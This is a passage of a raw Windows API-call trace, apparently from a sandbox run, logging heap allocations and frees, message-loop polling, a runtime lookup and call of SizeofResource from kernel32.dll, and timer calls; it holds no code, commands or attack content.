[0128.962] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66f8 | out: hHeap=0x12c0000) returned 1 [0128.962] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.962] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efcf0 [0128.962] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcf0 | out: hHeap=0x12c0000) returned 1 [0128.962] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.962] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300180 [0128.962] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66b0 [0128.962] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe10 [0128.962] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66b0 | out: hHeap=0x12c0000) returned 1 [0128.962] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1302648 [0129.036] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66b0 [0129.036] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66e0 [0129.036] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdb0 [0129.036] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66e0 | out: hHeap=0x12c0000) returned 1 [0129.036] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efce0 [0129.036] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0129.036] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0129.036] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efce0 | out: hHeap=0x12c0000) returned 1 [0129.036] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdb0 | out: hHeap=0x12c0000) returned 1 [0129.036] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.036] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300248 [0129.036] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66e0 [0129.036] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdb0 [0129.037] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdb0 | out: hHeap=0x12c0000) returned 1 [0129.037] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66f8 [0129.037] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdb0 [0129.037] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdb0 | out: hHeap=0x12c0000) returned 1 [0129.037] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66e0 | out: hHeap=0x12c0000) returned 1 [0129.037] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66f8 | out: hHeap=0x12c0000) returned 1 [0129.037] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300248 | out: hHeap=0x12c0000) returned 1 [0129.037] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.037] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0129.037] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.037] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe40 [0129.038] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdf0 [0129.038] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0129.038] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0129.038] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdf0 | out: hHeap=0x12c0000) returned 1 [0129.038] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe40 | out: hHeap=0x12c0000) returned 1 [0129.038] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e600 [0129.038] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.038] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e600 | out: hHeap=0x12c0000) returned 1 [0129.038] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.038] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdb0 [0129.039] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdc0 [0129.039] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316880 [0129.039] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316880 | out: hHeap=0x12c0000) returned 1 [0129.039] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdc0 | out: hHeap=0x12c0000) returned 1 [0129.039] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdb0 | out: hHeap=0x12c0000) returned 1 [0129.039] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0129.039] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.039] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0129.039] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.039] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0129.039] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdf0 [0129.039] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13167a0 [0129.040] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13167a0 | out: hHeap=0x12c0000) returned 1 [0129.040] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdf0 | out: hHeap=0x12c0000) returned 1 [0129.040] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0129.040] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0129.040] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.040] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0129.040] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.040] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0129.040] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe20 [0129.040] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13167a0 [0129.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13167a0 | out: hHeap=0x12c0000) returned 1 [0129.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe20 | out: hHeap=0x12c0000) returned 1 [0129.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0129.041] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0129.041] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0129.041] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.041] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0129.041] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd00 [0129.041] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0129.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0129.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0129.042] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0129.042] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0129.042] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.042] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0129.042] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.042] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efce0 [0129.042] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdb0 [0129.042] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316880 [0129.042] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316880 | out: hHeap=0x12c0000) returned 1 [0129.042] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdb0 | out: hHeap=0x12c0000) returned 1 [0129.042] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efce0 | out: hHeap=0x12c0000) returned 1 [0129.042] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df00 [0129.042] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.042] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efce0 [0129.043] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300298 [0129.043] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66e0 [0129.043] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe00 [0129.043] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66f8 [0129.043] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe00 | out: hHeap=0x12c0000) returned 1 [0129.043] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6740 [0129.043] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe50 [0129.043] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6980 [0129.043] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe50 | out: hHeap=0x12c0000) returned 1 [0129.043] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b69f8 [0129.043] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0129.043] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6860 [0129.043] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0129.044] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a10 [0129.044] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdb0 [0129.044] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a58 [0129.044] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdb0 | out: hHeap=0x12c0000) returned 1 [0129.044] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a40 [0129.044] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0129.044] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6920 [0129.044] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0129.044] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6aa0 [0129.044] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdb0 [0129.044] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a70 [0129.044] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdb0 | out: hHeap=0x12c0000) returned 1 [0129.044] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6ab8 [0129.044] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdb0 [0129.045] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdb0 | out: hHeap=0x12c0000) returned 1 [0129.045] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efdf0 [0129.045] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6908 [0129.045] CharLowerBuffW (in: lpsz="dword", cchLength=0x5 | out: lpsz="dword") returned 0x5 [0129.045] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6890 [0129.045] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd40 [0129.045] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efdb0 [0129.045] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b68a8 [0129.045] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6890 | out: hHeap=0x12c0000) returned 1 [0129.045] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd40 | out: hHeap=0x12c0000) returned 1 [0129.045] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b68a8 | out: hHeap=0x12c0000) returned 1 [0129.045] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdb0 | out: hHeap=0x12c0000) returned 1 [0129.045] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300360 [0129.045] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe20 [0129.046] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b67d0 [0129.046] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe40 [0129.046] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efdb0 [0129.046] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b69b0 [0129.046] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b67d0 | out: hHeap=0x12c0000) returned 1 [0129.046] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe40 | out: hHeap=0x12c0000) returned 1 [0129.046] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b69b0 | out: hHeap=0x12c0000) returned 1 [0129.046] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdb0 | out: hHeap=0x12c0000) returned 1 [0129.046] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efdb0 [0129.046] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b69b0 [0129.046] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efdc0 [0129.046] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe00 [0129.046] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b67d0 [0129.047] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b69b0 | out: hHeap=0x12c0000) returned 1 [0129.047] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdc0 | out: hHeap=0x12c0000) returned 1 [0129.047] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b67d0 | out: hHeap=0x12c0000) returned 1 [0129.047] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe00 | out: hHeap=0x12c0000) returned 1 [0129.047] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x74650000 [0129.048] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a88 [0129.048] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd40 [0129.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SizeofResource", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0129.048] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xf) returned 0x14b67d0 [0129.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SizeofResource", cchWideChar=15, lpMultiByteStr=0x14b67d0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SizeofResource", lpUsedDefaultChar=0x0) returned 15 [0129.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b67d0 | out: hHeap=0x12c0000) returned 1 [0129.049] GetProcAddress (hModule=0x74650000, lpProcName="SizeofResource") returned 0x74668f80 [0129.049] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a88 | out: hHeap=0x12c0000) returned 1 [0129.049] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd40 | out: hHeap=0x12c0000) returned 1 [0129.049] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300040 [0129.049] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efcf0 [0129.049] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe70 [0129.049] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcf0 | out: hHeap=0x12c0000) returned 1 [0129.049] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe70 | out: hHeap=0x12c0000) returned 1 [0129.049] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300040 | out: hHeap=0x12c0000) returned 1 [0129.049] SizeofResource (hModule=0x0, hResInfo=0xfe76b8) returned 0x57400 [0129.049] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe00 [0129.049] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x214) returned 0x1314628 [0129.049] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6830 [0129.050] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6800 [0129.050] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b69c8 [0129.050] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6848 [0129.050] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe30 [0129.050] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6848 | out: hHeap=0x12c0000) returned 1 [0129.050] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0129.050] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b69c8 | out: hHeap=0x12c0000) returned 1 [0129.050] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6998 [0129.050] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6890 [0129.050] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6818 [0129.050] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efcf0 [0129.050] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6818 | out: hHeap=0x12c0000) returned 1 [0129.050] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcf0 | out: hHeap=0x12c0000) returned 1 [0129.050] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6890 | out: hHeap=0x12c0000) returned 1 [0129.050] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b67d0 [0129.050] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a88 [0129.050] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a28 [0129.051] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe80 [0129.051] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a28 | out: hHeap=0x12c0000) returned 1 [0129.051] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe80 | out: hHeap=0x12c0000) returned 1 [0129.051] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a88 | out: hHeap=0x12c0000) returned 1 [0129.051] FreeLibrary (hLibModule=0x74650000) returned 1 [0129.051] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe20 | out: hHeap=0x12c0000) returned 1 [0129.051] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdb0 | out: hHeap=0x12c0000) returned 1 [0129.051] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300360 | out: hHeap=0x12c0000) returned 1 [0129.051] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6908 | out: hHeap=0x12c0000) returned 1 [0129.051] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdf0 | out: hHeap=0x12c0000) returned 1 [0129.051] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66f8 | out: hHeap=0x12c0000) returned 1 [0129.051] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66e0 | out: hHeap=0x12c0000) returned 1 [0129.051] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6980 | out: hHeap=0x12c0000) returned 1 [0129.051] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6740 | out: hHeap=0x12c0000) returned 1 [0129.051] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6860 | out: hHeap=0x12c0000) returned 1 [0129.051] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b69f8 | out: hHeap=0x12c0000) returned 1 [0129.051] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a58 | out: hHeap=0x12c0000) returned 1 [0129.051] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a10 | out: hHeap=0x12c0000) returned 1 [0129.051] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6920 | out: hHeap=0x12c0000) returned 1 [0129.052] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a40 | out: hHeap=0x12c0000) returned 1 [0129.052] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a70 | out: hHeap=0x12c0000) returned 1 [0129.052] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6aa0 | out: hHeap=0x12c0000) returned 1 [0129.052] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6ab8 | out: hHeap=0x12c0000) returned 1 [0129.052] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300298 | out: hHeap=0x12c0000) returned 1 [0129.052] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0129.052] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6980 [0129.052] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0129.052] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6980 | out: hHeap=0x12c0000) returned 1 [0129.052] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6800 | out: hHeap=0x12c0000) returned 1 [0129.052] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6998 | out: hHeap=0x12c0000) returned 1 [0129.052] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b67d0 | out: hHeap=0x12c0000) returned 1 [0129.052] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6830 | out: hHeap=0x12c0000) returned 1 [0129.052] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1314628 | out: hHeap=0x12c0000) returned 1 [0129.052] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe00 | out: hHeap=0x12c0000) returned 1 [0129.052] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efce0 | out: hHeap=0x12c0000) returned 1 [0129.052] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6770 | out: hHeap=0x12c0000) returned 1 [0129.052] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 1 [0129.053] TranslateMessage (lpMsg=0x7df524) returned 0 [0129.053] DispatchMessageW (lpMsg=0x7df524) returned 0x0 [0129.053] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0129.053] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0129.053] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.053] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fff78 [0129.053] RtlAllocateHeap 